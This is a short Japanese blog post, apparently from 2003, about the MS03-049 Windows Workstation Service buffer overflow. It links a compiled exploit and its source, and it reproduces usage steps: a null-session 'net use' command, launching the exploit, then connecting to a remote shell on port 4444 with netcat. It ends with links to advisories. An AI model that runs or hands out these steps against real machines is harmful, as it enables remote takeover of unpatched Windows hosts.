MS03-049 関連
ということでXP限定ですがコンパイル版登場
- 0349.exe
- ソース:0349.c.txt
D:\>0349.exe ms03-049 wkksvc.dll buffer overflow by wirepair. Usage: 0349.exeC:\>net use \\ip.ip.ip.ip\IPC$ "" /u:"" C:\>0349 ip.ip.ip.ip 1 (or 0) open new cmd: C:\>nc ip.ip.ip.ip 4444 If it doesn't hang the ip's invalid or it did not work
NULLセッションを確率後exploitを打ち込んで別のコマンドから4444に接続のようです。未検証。
関連記事:
- MS03-049が危険な理由
- Windowsの脆弱性(MS03-049)を攻撃するプログラムについて (@police)
- Windowsの脆弱性(MS03-049)を攻撃するプログラムについて(pdf)
- 雑学アドバイザリ 【 CA-2003-28 Workstation サービスを時系列に追っかけてみよう ・・・ 】(@Samさん)
- USのMicrosoft Security Bulletin MS03-043(MS)は更新されてMS03-043のパッチの件が追記
- Microsoft Workstation Service WKSSVC Remote Exploit (MS03-049)(securitylab.ru)
- Microsoft Workstation Service WKSSVC Remote Exploit (MS03-049)(securiteam)